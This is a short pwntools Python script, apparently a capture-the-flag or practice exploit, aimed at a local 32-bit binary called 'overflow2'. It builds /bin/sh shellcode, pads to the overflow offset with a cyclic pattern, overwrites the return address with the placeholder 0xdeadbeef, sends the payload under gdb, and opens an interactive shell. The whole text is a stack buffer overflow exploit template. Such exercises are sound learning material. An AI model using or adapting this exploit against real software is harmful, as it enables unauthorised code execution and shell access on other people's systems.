from pwn import *

context.update(arch='i386', os='linux')

shellcode = shellcraft.sh()
print(shellcode)

print(hexdump(asm(shellcode)))

p = process("./overflow2")

payload = cyclic(cyclic_find(0x61716161))
payload += p32(0xdeadbeef)
payload += asm(shellcode)


gdb.attach(p, '''
           echo "hi"
           # break *0xdeadbeef
           continue
           ''')
p.sendline(payload)

p.interactive()
